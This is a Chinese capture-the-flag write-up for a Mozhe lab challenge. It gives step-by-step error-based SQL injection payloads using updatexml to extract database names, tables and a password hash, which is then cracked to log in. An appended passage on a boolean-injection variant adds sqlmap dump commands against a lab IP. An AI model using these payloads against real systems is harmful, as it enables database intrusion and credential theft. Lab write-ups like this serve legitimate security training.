墨者-SQL注入漏洞测试(报错盲注) 题解

本文详细讲述了在未防护的MySQL系统中,通过公告界面和报错注入技巧,逐步获取数据库敏感信息的过程,包括库名、表名、字段值等,并利用这些信息进行登录。关键步骤包括字符型注入、unionselect、updatexml函数利用和字段值解析。

靶场地址:https://www.mozhe.cn/bug/detail/Ri9CaDcwWVl3Wi81bDh3Ulp0bGhOUT09bW96aGUmozhe

依旧是mysql、无防护

①依旧是公告界面
url:http://219.153.49.228:44679/new_list.php?id=1
1',1' and '1'='1' -- q,1' and '1'='2' -- q判断存在字符型注入,数据库类型为MariaDB

②order by 判断字段数为4,union select无回显

③尝试报错注入,利用函数updatexml()
updatexml参数(目标xml内容,xml文档路径,更新的内容)
当文档路径包含字符~,会判断不合法,输出字符~报错
利用concat函数将子查询语句与字符~拼接
例如:concat(0x7e,(select user()))
会将查询结果拼接~报错输出
所以尝试

id=1' and updatexml(1,concat(0x7e,(select user())),1) -- q
在这里插入图片描述
判断存在报错注入

④接下来还是联合注入那一套,替换子查询语句即可

id=1' and updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata)),1) -- q
爆出库名information_schema,mysql,perfor

查询perfor库是空的
database()查询出当前数据库为stormgroup,居然不在schema_name里

爆出表名member,notice

表member爆出字段name,password,status

⑤分别查询字段值

id=11111111' and updatexml(1,concat(0x7e,(select group_concat(字段) from member)),1) -- q

name字段:mozhe,mozhe
status字段:0,1
查询password字段时,根据另外两个字段可知有两条数据,因为报错长度最多为32位,字符~占了1位,剩下31位不够输出第一个32位的MD5密码,而且第一条数据status字段值为0,大概率用不了。
直接查询第二条数据

id=11111111' and updatexml(1,concat(0x7e,(select group_concat(password) from member where status='1')),1) -- q
在这里插入图片描述
得到~76e59b744c5db295a5f0b66f2e9a192
依旧少了一位,利用函数substr(字符串,32,1)输出第32位字符

id=11111111' and updatexml(1,concat(0x7e,(select substr(group_concat(password),32,1) from member where status=1)),1) -- q
得到~e
拼一拼得到76e59b744c5db295a5f0b66f2e9a192e
解密得到945748
mozhe/945748登录得到key

者靶场进行 SQL 注入漏洞测试(布尔),可按以下步骤操作: 1. **环境探查与漏洞初筛**:进入靶场环境找到后台管理页面,先尝试弱口令和万能密码,若失败则抓包查看登陆处是否存在注入漏洞。若未发现,仔细查看页面寻找新链接,点击跳转后若怀疑存在注入漏洞,可构造特定 URL 进行测试,以确认是否为数字型 SQL 注入漏洞。例如构造 `http://219.153.49.228:41979/new_list.php?id=1` 查看是否有回显,再构造 `http://219.153.49.228:41979/new_list.php?id=1'` 查看是否无回显,还可构造 `http://219.153.49.228:41979/new_list.php?id=1 and 1=1` 和 `http://219.153.49.228:41979/new_list.php?id=1 and 1=2` 分别查看有无回显来判断 [^1]。 2. **手动判断数据库信息** - **判断数据库名长度**:若未找到回显位,可尝试布尔型注入。如输入 `id=1 and length(database())=1`,根据返回页面是否空白判断长度是否为 1,逐个尝试确定数据库名长度 [^4]。 - **判断数据库名**:确定长度后,输入 `id=1 and substr(database(),1,1)='a' --+`,根据返回页面情况确定数据库名的第一个字符,依此类推确定整个数据库名 [^4]。 3. **使用 sqlmap 自动化操作** - **检测注入并获取数据库信息**:使用命令 `sqlmap -u <目标 URL>` 进行注入检测。若要获取数据库列表,可使用 `python2 sqlmap.py -u <目标 URL> -technique=B --dbs` 或 `sqlmap.py -u <目标 URL> --dbs` [^1][^2][^3][^4]。 - **获取数据库中的表**:确定数据库名(如 `stormgroup`)后,使用 `python2 sqlmap.py -u <目标 URL> -technique=B -D=<数据库名> --tables` 或 `sqlmap.py -u <目标 URL> -D <数据库名> --tables` 获取表名 [^1][^2][^4]。 - **获取表中的列**:使用 `python2 sqlmap.py -u <目标 URL> -technique=B -D <数据库名> -T <表名> --columns` 或 `sqlmap.py -u <目标 URL> -D <数据库名> -T <表名> --columns` 获取列名 [^1][^2][^4]。 - **获取表中的内容**:使用 `python2 sqlmap.py -u <目标 URL> -technique=B -D <数据库名> -T <表名> -C <列名> --dump` 或 `sqlmap.py -u <目标 URL> -D <数据库名> -T <表名> -C <列名> --dump` 获取指定列的内容 [^2][^4]。 4. **后续处理**:获取到加密的密码等信息后,可找网站进行 MD5 解密,然后使用解密后的信息尝试登录,获取 key [^1][^2][^4]。 ### 示例代码 ```bash # 使用 sqlmap 检测注入并获取数据库列表 sqlmap -u http://219.153.49.228:41979/new_list.php?id=1 --dbs # 获取指定数据库中的表 sqlmap -u http://219.153.49.228:41979/new_list.php?id=1 -D stormgroup --tables # 获取指定表中的列 sqlmap -u http://219.153.49.228:41979/new_list.php?id=1 -D stormgroup -T member --columns # 获取指定列的内容 sqlmap -u http://219.153.49.228:41979/new_list.php?id=1 -D stormgroup -T member -C name,password --dump ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Redredredfish

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值